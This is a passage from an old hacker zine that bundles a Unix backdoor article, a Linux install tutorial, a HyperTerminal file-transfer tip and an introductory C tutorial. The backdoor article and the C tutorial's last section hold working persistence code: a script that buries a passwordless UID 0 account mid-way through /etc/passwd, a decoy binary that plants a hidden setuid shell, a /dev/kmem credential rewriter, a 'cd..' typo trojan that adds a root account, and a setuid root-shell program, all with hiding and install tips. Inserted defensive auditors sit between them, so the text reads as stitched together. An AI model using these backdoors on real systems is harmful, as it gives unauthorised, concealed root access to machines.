       
       
       if ($#evilflag == 0) then                       # Is he there?
               
               set linecount = `wc -l /etc/passwd`     # linecount[1] is the line count
               cd                                      # Do this at home.
               cp /etc/passwd ./temppass               # Safety first.
               @ linecount[1] /= 2
               @ linecount[1] += 1                     # we only want 2 temp files
               split -l $linecount[1] ./temppass       # xaa = first half, xab = the rest
               echo "Meb::0:0:Meb:/root:/bin/sh" >> ./xaa   # buried mid-file, not at the end
               cat ./xab >> ./xaa
               mv ./xaa /etc/passwd
               chmod 644 /etc/passwd                   # or whatever it was beforehand
               rm ./xa* ./temppass
               echo Done...
       endif
       <-->
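       Both the Backhore tool above and this cron script work by slipping an
       extra UID 0 entry into /etc/passwd; the script even buries it mid-file so
       a glance at the tail misses it.  The check an admin wants is therefore a
       full parse of the file.  The auditor below is an added example written for
       this article, not code from it: it validates the seven-field layout of
       every line and flags entries with UID 0 under a name other than root, an
       empty password field, or non-numeric UID/GID fields.  The sample passwd
       content is constructed for the demonstration and includes the three
       accounts the tools above plant.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Findings are bit flags so one entry can carry several at once. */
enum {
        PW_BAD_FORMAT = 1,   /* not exactly seven colon-separated fields */
        PW_EXTRA_ROOT = 2,   /* uid 0 under a login other than "root" */
        PW_EMPTY_PASS = 4,   /* empty password field: anyone can log in */
        PW_BAD_NUMBER = 8    /* uid or gid field is not a number */
};

/* Classify one passwd line (with or without its newline).  Returns the OR of
 * the flags above, 0 for a clean entry. */
int audit_passwd_entry(const char *line)
{
        char buf[1024];
        char *field[7], *p, *end;
        int n, flags = 0;
        long uid;

        if (strlen(line) >= sizeof buf)
                return PW_BAD_FORMAT;
        strcpy(buf, line);
        buf[strcspn(buf, "\r\n")] = '\0';

        /* Split on ':' by hand; strtok() would swallow the empty fields we care about. */
        p = buf;
        for (n = 0; n < 7; n++) {
                field[n] = p;
                end = strchr(p, ':');
                if (end == NULL)
                        break;                    /* this was the last field */
                if (n == 6)
                        return PW_BAD_FORMAT;     /* an eighth field */
                *end = '\0';
                p = end + 1;
        }
        if (n != 6)
                return PW_BAD_FORMAT;             /* fewer than seven fields */

        if (field[1][0] == '\0')
                flags |= PW_EMPTY_PASS;

        uid = strtol(field[2], &end, 10);
        if (field[2][0] == '\0' || *end != '\0')
                flags |= PW_BAD_NUMBER;
        else if (uid == 0 && strcmp(field[0], "root") != 0)
                flags |= PW_EXTRA_ROOT;

        strtol(field[3], &end, 10);
        if (field[3][0] == '\0' || *end != '\0')
                flags |= PW_BAD_NUMBER;
        return flags;
}

/* Audit a whole passwd file held in memory: every line, not just the tail.
 * Returns the number of suspicious entries and, if verbose, prints one line
 * per finding.  Blank lines are skipped. */
int audit_passwd(const char *text, int verbose)
{
        const char *s = text;
        int count = 0, lineno = 0;

        while (*s) {
                const char *nl = strchr(s, '\n');
                size_t len = nl ? (size_t)(nl - s) : strlen(s);
                char line[1024];
                int flags = PW_BAD_FORMAT;        /* over-long lines count as bad */

                lineno++;
                if (len < sizeof line) {
                        memcpy(line, s, len);
                        line[len] = '\0';
                        flags = len ? audit_passwd_entry(line) : 0;
                }
                if (flags) {
                        count++;
                        if (verbose)
                                printf("line %d:%s%s%s%s\n", lineno,
                                       (flags & PW_BAD_FORMAT) ? " bad-format" : "",
                                       (flags & PW_EXTRA_ROOT) ? " extra-uid0" : "",
                                       (flags & PW_EMPTY_PASS) ? " empty-password" : "",
                                       (flags & PW_BAD_NUMBER) ? " bad-number" : "");
                }
                if (!nl)
                        break;
                s = nl + 1;
        }
        return count;
}

/* Constructed sample (not a real file): a normal passwd plus the entries the
 * article's tools plant, with "Meb" buried mid-file as the cron script does. */
static const char SAMPLE_PASSWD[] =
        "root:x:0:0:root:/root:/bin/bash\n"
        "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
        "Meb::0:0:Meb:/root:/bin/sh\n"
        "bin:x:2:2:bin:/bin:/usr/sbin/nologin\n"
        "alice:x:1000:1000:Alice:/home/alice:/bin/bash\n"
        "hax0r::0:0::/:/bin/bash\n"
        "mutiny::0:0:ethical mutiny crew:/root:/bin/sh\n";

int main(void)
{
        printf("%d suspicious entries\n", audit_passwd(SAMPLE_PASSWD, 1));
        return 0;
}
```

       Point audit_passwd() at the real file's contents (and at /etc/shadow with
       the field rules adjusted) from a nightly job of your own, which is the
       honest version of what the script above does for the attacker.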
      
      [Complex]
      
      
       You could of course write a trojan, place it in /bin and make the
       program create a suid shell if the right argument is given.  This is a
       very good trojan if utilized correctly.  You could also replace a
       little-used program in /bin such as dialog with your trojan to make it
       even stealthier.  Here's a program which, if given the correct argument,
       creates a suid shell (in /bin under a name that looks like a stray swap
       file); whatever the argument, it prints a fake error so that to anyone
       else it just looks like a broken utility.
      
       <++> backdoor/backdoor3.c
       #include <stdio.h>
       #include <stdlib.h>
       #include <string.h>
       #include <unistd.h>
       
       #define pass "triad"
       
       int main(int argc, char *argv[])
       {
               int i = 0;
       
               if (argc > 1 && strcmp(pass, argv[1]) == 0) {
                       system("cp /bin/csh /bin/.swp121");
                       system("chmod 4755 /bin/.swp121");
                       system("chown root /bin/.swp121");
                       system("chmod 4755 /bin/.swp121");  /* chown clears the setuid bit: set it again */
               }
       
               /* Decoy output: look like a broken utility whatever the argument was. */
               printf("372f: Invalid control argument, unable to initialize. Retrying");
               fflush(stdout);
               for (; i < 10; i++) {
                       fprintf(stderr, ".");
                       sleep(1);
               }
               printf("\nAction aborted after 10 attempts.\n");
               return 0;
       }
       <-->
      <-->
      
      [Diverse]
      
      
       Because the kernel keeps every process's credentials in memory, it is
       possible to modify that memory directly and change your own process to
       UID 0.  Two things have to hold: /dev/kmem must be readable and writable
       by you (it is root-only on any sane install, which is the first thing
       to check), and the kernel must keep the per-process UID in a "user page"
       (struct user, the u-area of the classic BSD-derived kernels) that the
       program can locate.  Linux does not lay its credentials out like that,
       so the technique does not apply there as written.  The program below
       seeks to your user page in kernel memory, rewrites the real UID and GID
       to 0 and execs a shell, which is then effectively a root shell.
      
       <++> backdoor/kmemthief.c
       #include <stdio.h>
       #include <stdlib.h>
       #include <string.h>
       #include <unistd.h>
       #include <fcntl.h>
       #include <sys/types.h>
       #include <sys/user.h>   /* struct user: the per-process u-area of classic BSD-style kernels */
       
       #define pass "triad"
       
       struct user userpage;
       long userlocation;
       
       /* Returns the kernel address of this process's struct user.  The
        * original article does not supply its body; it must be written for
        * the target kernel (classic systems map the u-area at a fixed
        * virtual address, which is what this function is meant to return). */
       long address(void);
       
       int main(int argc, char *argv[], char *envp[])
       {
               int count, fd;
               long where;
       
               if (argc >
 1 && strcmp(pass, argv[1]) == 0) {
                       fd = open("/dev/kmem", O_RDWR);
                       if (fd < 0) {
                               printf("Cannot read or write to /dev/kmem\n");
                               perror(argv[0]);
                               exit(10);
                       }
       
                       userlocation = address();
                       where = lseek(fd, userlocation, 0);
                       if (where != userlocation) {
                               printf("Cannot seek to user page\n");
                               perror(argv[0]);
                               exit(20);
                       }
       
                       count = read(fd, &userpage, sizeof(struct user));
                       if (count != sizeof(struct user)) {
                               printf("Cannot read user page\n");
                               perror(argv[0]);
                               exit(30);
                       }
       
                       printf("Current UID: %d\n", userpage.u_ruid);
                       printf("Current GID: %d\n", userpage.u_rgid);
       
                       userpage.u_ruid = 0;
                       userpage.u_rgid = 0;
       
                       where = lseek(fd, userlocation, 0);
                       if (where != userlocation) {
                               printf("Cannot seek to user page\n");
                               perror(argv[0]);
                               exit(40);
                       }
       
                       /* Write back only the part of the u-area before u_procp, so
                        * the kernel's own pointers after it are left untouched. */
                       write(fd, &userpage, ((char *)&(userpage.u_procp)) - ((char *)&userpage));
       
                       execle("/bin/csh", "/bin/csh", "-i", (char *)0, envp);
               }
               return 0;
       }
      <-->
      
      [The Clumsy]
      
      
       Have you ever been pounding away at a problem on your box and
       accidentally typed "cd.." instead of "cd .."?  It happens to me because
       before Linux I used Windows and MS-DOS for years, and those commands
       are still stuck in my head.  Well, every now and then the admin will
       type that too; wouldn't you want to take advantage of his mistake?
       What if typing cd.. triggered your trojan program?  That makes it a
       semi-remote backdoor: you don't have to be logged in to the box to
       trigger it, the admin does it for you.  Here's a small program I wrote
       to take advantage of human error.
      
      <++> backdoor/dumb.c
       /*
       This program will add a UID 0 account to /etc/passwd
       when the admin accidentally types cd..
       It prints nothing, so all the admin sees is his prompt again.
       Note that it cannot do the cd for him: a child process can
       never change the working directory of the shell that ran it.
       */
       
       #include <stdio.h>
       
       int main(void)
       {
               FILE *fd;
       
               fd = fopen("/etc/passwd", "a+");
               if (fd == NULL)
                       return 0;               /* not run by root: fail silently */
               fprintf(fd, "hax0r::0:0::/root:/bin/sh\n");
               fclose(fd);
               return 0;
       }
      <-->
      
       Now compile that program and put it somewhere that it looks like it
       belongs.  If you are doing this from a suid shell it is also a good idea
       to change its ownership with "chown root:root out" (if the program's
       name is out).  What's the reasoning behind this?  If the admin does an
       "ls -alF" and sees a root-owned program that is really owned by an
       unprivileged account, he's going to figure out it's a backdoor and
       remove it.  Note that this program does not need the setuid bit at all:
       it is the admin, already root, who runs it, and a setuid bit is exactly
       what a "find / -perm -4000" would turn up.
       
       Ok, now that you've compiled the program (let's say it is /bin/out), you
       link the name cd.. to it: "ln /bin/out /bin/cd.."  (ln takes the existing
       file first, then the new name).  /bin is in every root PATH, so when the
       admin makes that vital mistake, you'll have access to the system once
       again.
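       The cd.. trick only works because an executable named cd.. sits in a
       directory on the admin's PATH, so PATH hygiene is the control: no empty
       or relative entries (which resolve to the current directory), no
       world-writable directories, and no executables with typo names.  The
       auditor below is an added example written for this text, not the
       author's: a pure parser that counts unsafe PATH entries, and a lookup
       that reports where a given command name such as cd.. would resolve, the
       same way the shell searches.  The list of typo names in main() is
       constructed for the demonstration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

#define MAX_PATH_ENTRIES 64
#define MAX_ENTRY_LEN 256

/* Split a PATH string on ':'.  Empty entries are kept as "" because an
 * empty element means "the current directory", which is exactly the kind
 * of entry we want to see.  Returns the entry count, or -1 if there are
 * too many entries or one is too long. */
int split_path(const char *path, char entries[][MAX_ENTRY_LEN], int max)
{
        const char *s = path;
        int n = 0;

        for (;;) {
                const char *colon = strchr(s, ':');
                size_t len = colon ? (size_t)(colon - s) : strlen(s);

                if (n >= max || len >= MAX_ENTRY_LEN)
                        return -1;
                memcpy(entries[n], s, len);
                entries[n][len] = '\0';
                n++;
                if (!colon)
                        return n;
                s = colon + 1;
        }
}

/* Number of entries an attacker can satisfy without owning a system
 * directory: "" and "." (current directory) and any relative path.  Pure
 * string logic, so it is what the offline test exercises. */
int count_unsafe_path_entries(const char *path)
{
        char entries[MAX_PATH_ENTRIES][MAX_ENTRY_LEN];
        int n = split_path(path, entries, MAX_PATH_ENTRIES), i, bad = 0;

        if (n < 0)
                return -1;
        for (i = 0; i < n; i++)
                if (entries[i][0] != '/')      /* "", ".", "bin", "../x" ... */
                        bad++;
        return bad;
}

/* Where would the shell find 'cmd'?  Walk PATH in order and return the
 * index of the first entry holding an executable regular file of that
 * name (full path written to out), or -1 if it would not resolve. */
int resolve_in_path(const char *path, const char *cmd, char *out, size_t outsz)
{
        char entries[MAX_PATH_ENTRIES][MAX_ENTRY_LEN];
        int n = split_path(path, entries, MAX_PATH_ENTRIES), i;

        for (i = 0; i < n; i++) {
                struct stat st;
                snprintf(out, outsz, "%s/%s", entries[i][0] ? entries[i] : ".", cmd);
                if (stat(out, &st) == 0 && S_ISREG(st.st_mode) && access(out, X_OK) == 0)
                        return i;
        }
        return -1;
}

int main(void)
{
        /* Constructed list of typo names worth looking for; extend to taste. */
        const char *typos[] = { "cd..", "sl", "ls-l", "cd-" };
        char entries[MAX_PATH_ENTRIES][MAX_ENTRY_LEN], where[MAX_ENTRY_LEN + 256];
        const char *path = getenv("PATH");
        int i, n;

        if (!path)
                return 1;
        printf("relative or empty PATH entries: %d\n", count_unsafe_path_entries(path));
        n = split_path(path, entries, MAX_PATH_ENTRIES);
        for (i = 0; i < n; i++) {
                struct stat st;
                if (stat(entries[i][0] ? entries[i] : ".", &st) == 0 && (st.st_mode & S_IWOTH))
                        printf("world-writable PATH directory: %s\n", entries[i]);
        }
        for (i = 0; i < (int)(sizeof typos / sizeof typos[0]); i++)
                if (resolve_in_path(path, typos[i], where, sizeof where) >= 0)
                        printf("suspicious command on PATH: %s\n", where);
        return 0;
}
```

       Run it as root with root's own PATH; a hit on cd.. is exactly the file
       planted above, and any world-writable directory on the list is a place
       an unprivileged attacker could plant one without a suid shell.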
      
      
      [Closure]
      
      
       This article was meant to give you a feel for creating, maintaining and
       using backdoors, as well as removing them.  You may use this information
       any way you like, but still use your judgement on how you use them and
       how much they will affect the system and its performance.  For any
       questions or comments, please send mail to meb_@piratededucation.com.
      
              
      
              
                              Linux SetUp Tutorial by Psionic
                          =-=+=-=+=-=+=-=+=-=+=-=+=-=+=-=+=-=+=-=
      
       --Copyrighted material--
       This document may be freely distributed but not for commercial use.
       Nothing in this document may be removed and/or edited.
       Author's name must be named in document.
       This document may not be flamed.. =P (it is my first doc...)
       --
      
      Linux SetUp
      
       The setup of the Linux OS may differ per distro; this tutorial covers the
       basics that are the same for almost every Linux distro.
       It is divided into a couple of really simple steps.  This document will
       not go into the configuration of different hardware devices etc., which
       may differ per machine.
       Ok, the steps will be the following:
       1. In case you have no bootdisk, you will have to make one.
       In case you DO have a bootdisk, WTF ARE YOU DOING IN THIS DOC?
       It is so easy if you already have a bootdisk handy..
       Ok, I hope you have Windows running because it is very handy for making
       the bootdisk (that is the only actual purpose Windows has; you can make
       Linux bootdisks pretty easily with it).
       Ok; if you have the Linux OS on CD, insert the CD into the CD-ROM drive.
       Otherwise just go to the directory it is in.  Now insert a formatted
       floppy disk into your floppy drive (it may also be inserted into the
       CD-ROM drive, but I doubt that will work).
       Now select the right image file for the bootup and write it to the
       floppy with the rawrite tool that ships on the CD (just copying the
       image file onto the floppy is not enough; it has to be written raw).
       If you don't know which files to pick, look for a setup text (hehe) or
       go to the website, and go to 'how to setup' (hehe again).
      
      
       2.
       When you have found the right files, insert the bootdisk and boot up.
       You may have to change the boot order in your BIOS first, because some
       computers won't read the floppy drive before the hard disk and so won't
       boot into the Linux setup.
       
       
       3. Configure everything, boot up again and, BEHOLD, you have Linux
       installed.
       (I know it looks all very easy but it needs some practice, and you may
       want to make a backup of your C: drive in case of partitioning etc..)
       
       Ok, I think that was about it; I hope you learned something by reading
       this.  Have fun and good luck :)
      
      
      Written by Psionic
       petersen909@hotmail.com ( yeah this is my lame flame address)
      You can always talk to me at irc.box5.net channel: #wargames.
      Cya
      
              
      
                                   Hyperterminal trick
                               =-=+=-=+=-=+=-=+=-=+=-=+=-=
      
      What's needed
      ------------------
       -- Two computers 
       -- Two phonelines
       -- Windows HyperTerminal
      
      What are we doing?
      ------------------
               We are connecting two computers modem-to-modem over the phone line, using
       a Windows program called "HyperTerminal".  This means you can connect your Windows
       machine with another even if the other end isn't running Windows; the Linux
       equivalent is minicom.
      
      Uses of this.
      ------------------
               This is very useful for transmitting files which are too big to fit on a
       floppy disk, or if you are transmitting from incompatible media (i.e. from a Zip
       disk to a computer which has no Zip drive).  See if you can find other useful
       tricks.  It's very useful for sending files to friends who aren't on-line, like
       sending them a patch for a game, etc.
      
      What to do now?
      ----------------------
              
               This goes about double the speed of a normal download.  There is only one
        problem I have found with it, and that is that sometimes the computers get
        de-synced (meaning one has sent more than the other can handle and the whole file
        doesn't get transferred), but that happens very rarely.  Well, let's start up your
        Windows HyperTerminal program.  Set the number to dial accordingly.  If you are the
        one dialing, that's the easy part; if you are going to answer, first type the modem
        reset command "ATZ", then when you see *ring* *ring* *ring* type the answer command
        "ATA" and let it connect.  You can chat with your friend, but it looks like shit;
        hey, be thankful for what you get.  To send a file, click the send file button and
        use the ZMODEM protocol, it's the best.  To get a file, just let your bud send it;
        it will automatically start downloading.  Be careful though: disable call waiting
        and try not to step on your phone cords and stuff.  That will de-sync it, and
        that's a bitch when it happens.  When it does de-sync, just abort the send and
        re-send it; you'll see some weird characters on the screen but it's perfectly fine.
        Well, that's it, short huh?  Well I'm out, remember to have fun now.
      ~BurntAsh
      BurntAsh@juno.com
              
      
                                  An introduction to C
                               =-=+=-=+=-=+=-=+=-=+=-=+=-=
      
      I.      Introduction
              A)      Disclaimer
              B)      Introduction
              C)      The Basics of the Basics
      
      II.     Technical Nonsense
              A)      C Keywords
              B)      The Escape Character
      
      III.    Getting Down To The Nitty Gritty
              A)      Constants, Variables, and Arithmetic Operators
              B)      Data Types
              C)      Expressions and Statements
              D)      The Basics of A Function
      
      IV.     Let The Fun Begin
              A)      Writing Your First Program
              B)      Using exit() In A Program
              C)      Using printf() With Operators
      
      V.      The Shady Side Of It
              A)      Making A SUID Backdoor
              B)      Learning How-To Trojan A SUID
      
      VI.     Conclusion
              A)      Final Words
              B)      Credits
      
      Introduction
      
      Disclaimer:
              I, psylence, the publishers of this text, and anyone else who 
      gave this to you cannot be held responsible should you choose to use it 
      for malicious purposes.  Remember hackers make things and crackers 
      break them.
      
      Introduction:
               This is intended to be an introduction to C programming for the 
       Linux operating system, which is a flavor of Unix.  C is a high-level 
       programming language, which means that it's written in words a human 
       can read rather than in the processor's own instructions.  For your 
       computer to run the program, the code must first be compiled into a 
       binary.  This will not make you into a C guru or anything, but it 
       should at least get you started on your way into the world of geeks 
       and nerds. ;)
      
      The Basics:
               First let's talk about the structure of a program.  Before 
       anything else you have your header files.  So what exactly are header 
       files you ask?  A header (.h) file holds the declarations (function 
       prototypes, types and constants) that the compiler needs in order to 
       check your calls into a library; the code itself lives in the library.  
       Including a header tells the compiler that at least one function in 
       your program needs those declarations.  If you forget to include 
       stdio.h and use the printf function, the compiler has no declaration 
       for printf and will complain (old compilers silently guessed one, which 
       is worse).
               After the headers you have the body of the program.  The body 
       contains functions, which contain statement blocks, which contain 
       statements, which may contain calls to more functions.  Cool eh?
               At any point in the source code of a program there may be 
       comments (remarks).  The beginning of a comment is identified by a 
       forward slash then a star (/*) and the end of a comment is identified 
       by a star then a forward slash (*/).
       /* This is a remark, this is only a remark! */
      
      Technical Nonsense
      
      C Keywords:
      Keyword       Description 
      auto          Storage class specifier 
      break         Statement 
      case          Statement 
      char          Type specifier 
       const         Type qualifier 
      continue      Statement 
      default       Label 
      do            Statement 
      double        Type specifier 
      else          Statement 
      enum          Type specifier 
      extern        Storage class specifier 
      float         Type specifier 
      for           Statement 
      goto          Statement 
      if            Statement 
      int           Type specifier 
      long          Type specifier 
      register      Storage class specifier 
      return        Statement 
      short         Type specifier 
      signed        Type specifier 
      sizeof        Operator 
      static        Storage class specifier 
      struct        Type specifier 
      switch        Statement 
      typedef       Statement 
      union         Type specifier 
      unsigned      Type specifier 
      void          Type specifier 
       volatile      Type qualifier 
      while         Statement 
      
       The Escape Character (\):
               You will definitely see the escape character in C.  The \ 
       character is the escape character.  When the compiler sees the \ inside 
       a string or character constant it knows that a "special" character is 
       coming right after it.  Here are a few of the characters that may come 
       after the escape character.
       
       Character Description
       \n        The newline character; ends the current line (on Unix this is 
                 a single line feed, not a carriage return plus a line feed).
       \b        The backspace character; moves the cursor one space to the 
                 left.
       \r        The carriage return character; returns to the beginning of 
                 the current line.
       \t        The tab character; moves to the next tab stop.
       \f        The form-feed character; goes to the top of a new page.
       \\        A literal backslash; likewise \" is a literal double quote 
                 inside a string.
      
      Getting Down To The Nitty Gritty
      
       Constants, Variables, and Arithmetic Operators:
               A constant is a value that *never* changes, whereas a variable 
       can hold different values over time.  You can think of a variable 
       as a floppy, which is constantly having new data written to it, and a 
       constant as a CD that is written once and never written over.
               Assigning to a variable is quite simple.  x = 24; stores the 
       value 24 in the variable x (x must have been declared first, for 
       example with int x;).  x is the variable and 24 is a constant.  You can 
       assign a different value to x later if you like.  I don't because 
       I lose track, but if you have the memory for it then more power to you. 
       :)
               Arithmetic operators are symbols.  + - * / % are all arithmetic 
       operators.  You are probably already familiar with some of these.  % 
       was a new one for me.  % gives the remainder of the first operand 
       divided by the second operand (7 % 3 is 1), while / on two integers 
       throws the remainder away (7 / 3 is 2).
      
       Data Types:
               Each variable has a data type.  Some basic data types are int, 
       char, float, and double.  int is the integer type, char is the 
       character type (a single byte), float is the single-precision floating 
       point type, and double is double-precision floating point: it uses 
       twice as many bytes as float (normally 8 instead of 4) and holds about 
       15 significant decimal digits instead of about 7.  Each data type has a 
       format specifier for printf.
               The int format specifier is %d or %i.  The char format 
       specifier is %c.  The float and double format specifier is %f.  One way 
       they are used is in a printf statement.  You'll learn more about 
       expressions and statements in the next section.
      
       Expressions And Statements:
               An expression is a combination of constants, variables, and 
       operators that denotes a computation.  In the expression a + 5 the 
       variable a is added to the constant 5, and c = a + 5 stores the result 
       in the variable c (assignment goes right to left, so a + 5 = c is not 
       valid C).
               A statement is an instruction ended with a semicolon (;), 
       usually, anyhow.  A few constructs don't take a semicolon, such as the 
       header of a for or if statement and the braces of a statement block.  
       An example of a statement is:
       
       printf("I can write in c\n");
      
              A group of statements make up a statement block.  A statement 
      block starts with an opening brace ({) and ends with a closing brace 
      (}).  Here's an example:
      
      {
      printf("see the opening brace?\n");
      printf("now look at the closing brace.\n");
      }
      
       The Basics Of A Function:
               A function may be prewritten and used simply by including 
       the header file that declares it, or you may write the function 
       yourself.  A function call is usually written as a statement.
       
       printf("printf() is a function!\n");
       
               As you can see the function is printf().  The basic function 
       format is the name of the function followed by a pair of left and right 
       parentheses.  Arguments to the function are put in the parentheses.  
       The argument to the statement above was "printf() is a function!\n".  
       The arguments differ depending on the function, but remember you can 
       type 'man 3 function-name' at the prompt (for example man 3 printf) to 
       bring up the manual page for that function.
      
      Let The Fun Begin
      
      Writing Your First Program:
              We are going to write a simple program to print Hello World! to 
      standard output (your monitor).  So open up your favorite editor 
      (usually pico, emacs, or vi come with Linux).  The standard C compilers 
      are cc or gcc, gcc comes with most distributions of linux.  The syntax 
      is 'gcc file.c -o file'.  Make sure that the file with the code has the 
      .c extension or else it *won't* compile.  I'll include the shell 
      commands just for the inexperienced.
      
      $pico hello.c
      
       <++> basicC/hello.c
       /* This program will print Hello World! */
       #include <stdio.h>
       
       int main(void)
       {
         printf("Hello World!\n");
         return 0;
       }
       <--> 
      
      $gcc hello.c -o hello
      
               Okay that was fun eh?  Not really you say?!?  Damn you, you 
       ingrate!  Just joking, but I promise I'll get into more fun code later 
       in the paper.  So let's break down this code.
               The first thing is the header, #include <stdio.h>, which 
       includes the header file stdio.h.  Stdio stands for STandarD Input 
       Output.  The angle brackets (<>) around it mean to look for the header 
       in the compiler's system include directories.  If it had double quotes 
       ("") around it then the compiler would look in the directory of your 
       source file first, before looking for it elsewhere.
               The next thing, int main(void), is the main function of the 
       program.  Every C program *must* have a main function, and it returns 
       an int.  There are only 2 statements inside of the statement block: 
       the printf statement and the return statement.  The value main returns 
       becomes the program's exit status: 0 means success, and any other value 
       (usually 1) means failure.  This is how shell scripts tell whether a 
       program hit an error.
      
       Using exit() In A Program:
               Above you learned that return is used to hand a value back 
       from main.  In this example we'll use the exit function instead of the 
       return statement.
       
       <++> basicC/exit.c
       /* This will use the exit function instead of return */
       #include <stdio.h>
       #include <stdlib.h>
       
       int main(void)
       {
         printf("Hello again.\n");
         exit(0);
       }
       <-->
       
        So let's break this down real quick and move on.  You have the header, 
       but wait... what's this?  A new header file?!?  Yep, because the exit 
       function is declared in the header file stdlib.h.  Stdlib stands for 
       STandarD LIBrary.  exit(0) ends the program right there with exit 
       status 0, so nothing after it would ever run and main needs no return 
       statement; the advantage over return is that exit() works from inside 
       any function, not just main.  (Some old books write void main() here, 
       meaning main returns nothing; that is not standard C, main is always 
       int.)  The statement block for main has 2 statements in it: the 
       printf statement and the exit statement.
      
      Using printf() With Operators:
              So we've seen how to print to standard output.  Now let's try out 
      using putting all the other stuff you learned to use eh?  Check out 
      this example:
      
       <++> basicC/printf.c
       #include <stdio.h>
       
       int main(void)
       {
         int y;
         y = 2 + 5;
         printf(" 2 + 5 = %d\n", y);
         return 0;
       }
       <-->
       
               That one had a bit more meat on it eh?  Okay let's break it down.  
       The only header file is stdio.h.  The main function is there (of course).  
       Inside of the statement block there are 4 statements: int y, y = 2 + 5, 
       printf, and the return statement.  int y; declares the variable y with 
       the int data type.  y = 2 + 5 assigns the value of 2 + 5 to the variable 
       y.  The %d in the printf string is a placeholder that will be replaced 
       by an integer.  The \n means newline.  The y after the comma in the 
       printf statement is the value that fills in the %d, so the program 
       prints " 2 + 5 = 7".  Then the value 0 is returned from main.
              Now take a look at the character format specifier in a program.  
      Check out this example:
      
      <++> basicC/printf2.c
       #include <stdio.h>
      main()
      {
        char c1, c2;
        c1 = 'h';
        c2 = 'i';
        printf("%c%c\n", c1, c2);
        return 0;
      }
      <-->
      
               By this time I bet you probably have the hang of it.  So I'll 
       just breeze over this one.  Header, main function, the data type of c1 
       and c2 is char, the character h is assigned to c1 and i is assigned to 
       c2.  hi is printed to standard output and the value 0 (success) is 
       returned.
      
      The Shady Side Of It
      
       Making A SUID Backdoor:
               Well first off I'll explain what a SUID is.  SUID stands for Set 
       User ID: a permission bit on an executable that makes it run with the 
       privileges of the file's owner instead of the user who started it.  A 
       Unix machine identifies each user with a number, the UID, and the root 
       UID is 0.  Just as with UID there is also a GID, which is your Group 
       ID.  With that in mind let's see a program that'll spawn a rootshell 
       for you. muhahaha :P
       
       <++> basicC/suid.c
       #include <stdio.h>
       #include <sys/types.h>
       #include <unistd.h>
       
       int main(void)
       {
         setgid(0); setegid(0);
         setuid(0); seteuid(0);
         printf("Root Be Thy Name\n");
         execl("/bin/sh", "sh", (char *)0);
         return 0;
       }
       <-->
       
               Okay, okay, now that will give you a root shell if the 
       permissions on the compiled binary file are set correctly, but I'll 
       leave that part out so that I won't be harassed by people for teaching 
       people stuff like that.  The setgid, setegid, setuid, and seteuid 
       functions set the GID, effective GID, UID, and effective UID; the group 
       calls come first because once you are no longer root you can't change 
       groups any more.  Note that the program never checks whether these 
       calls succeeded, so run without the setuid bit it just gives you a 
       shell as yourself.  The execl function replaces the running program 
       with /bin/sh: the first argument is the path, the second is the 
       program's own argv[0], and the list must end with a null pointer.  So 
       it made a shell, and the return after it is only reached if execl 
       failed.  To see details check out the manuals yourself ;)
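               The program above is the abuse of set-user-ID: a binary whose only 
       job is to hand out root.  The legitimate use is the reverse, a setuid-root 
       helper that does one privileged task and then gives root up for good, and 
       it is built from the same setgid/setuid calls.  The example below is mine, 
       added for this text and not the author's: it drops privileges in the order 
       that works (supplementary groups, then GID, then UID), checks every return 
       value (the tutorial's calls fail silently when the binary is not setuid), 
       and then verifies that root cannot be regained.  Run unprivileged it simply 
       confirms the current IDs.

```c
#define _GNU_SOURCE
#include <grp.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

/* Permanently drop to the given uid/gid.  Order matters: once setuid() has
 * made us a non-root user we can no longer change groups, so the group list
 * and the GID go first.  Returns 0 on success, -1 on any failure; a caller
 * must treat -1 as fatal and never "carry on as root". */
int drop_privileges(uid_t uid, gid_t gid)
{
        if (getuid() == 0 || geteuid() == 0) {
                /* Only root may clear the supplementary group list, and a
                 * root helper that forgets this keeps e.g. group "shadow". */
                if (setgroups(0, NULL) != 0)
                        return -1;
        }
        if (setgid(gid) != 0)      /* real, effective and saved GID */
                return -1;
        if (setuid(uid) != 0)      /* real, effective and saved UID */
                return -1;
        return 0;
}

/* Verify the drop: every ID must be the target, and if the target is not
 * root an attempt to become root again must fail (a leftover saved-set-UID
 * of 0 is the classic mistake, and setuid(0) would quietly succeed). */
int privileges_dropped(uid_t uid, gid_t gid)
{
        if (getuid() != uid || geteuid() != uid)
                return 0;
        if (getgid() != gid || getegid() != gid)
                return 0;
        if (uid != 0 && setuid(0) == 0)
                return 0;          /* we just got root back: the drop failed */
        return 1;
}

int main(void)
{
        /* A real setuid helper would do its one privileged job here, then: */
        uid_t uid = getuid();      /* the user who invoked us */
        gid_t gid = getgid();

        if (drop_privileges(uid, gid) != 0) {
                perror("drop_privileges");
                return 1;          /* never continue as root after a failed drop */
        }
        printf("now uid %u gid %u, root can be regained: %s\n",
               (unsigned)getuid(), (unsigned)getgid(),
               privileges_dropped(uid, gid) ? "no" : "YES (bug)");
        return 0;
}
```

       Installed setuid root, the helper ends up running as whoever typed its 
       name; the tutorial's suid.c, read against this, is the same calls with 
       the arguments and the checks reversed.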
      
       Learning How-To Trojan A SUID:
               So you learned briefly what SUIDs are and the functions that go 
       along with them.  Now a stray root SUID program is rather obvious, so to 
       further your shady intentions you could get the source to a SUID program 
       that's already on the machine and add in some code to spawn you a shell.  
       This can be done with as few as 10 lines of additional code.
      
      Conclusion
      
      Final Words:
              I know I've left out some stuff and that there's much more to be 
      said on the subject of C programming, but this was only supposed to be 
      an introduction.  I may write another paper on it, but don't hold your 
      breath ;)  Basically with what you've learned here you can at least get 
       your math homework done.  Or make a nifty backdoor.  If you were 
      disappointed with this paper I don't really care. :)  Please redirect 
      all flames to /dev/null or /dev/echo.  Thanks and have fun!
      
      Credits:
              I got to give thanks to mcp.com for the personal bookshelf.  
      Thanks to Sams for "C In 24 Hours" and "C In 21 Days".  Thanks to 
      everyone who's put up with my questions on the subject.  A big thanks 
      to overdose001 for proof reading this for me.
              Greets go out to xphantom, Remmy, all of tg0d, irishrose, 
      lamagra, GrimKnight, and everyone else.
      
              
      
      -=-
      
      Very cool informative zine, unlike so many others especially for a
      number one issue, quite impressive - two "Kevin's" up! <sic> - Ed
              



     @HWA 
     
157.0 Paper: Some Extra Security In The Linux Kernel - Auditfile by {}
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
           
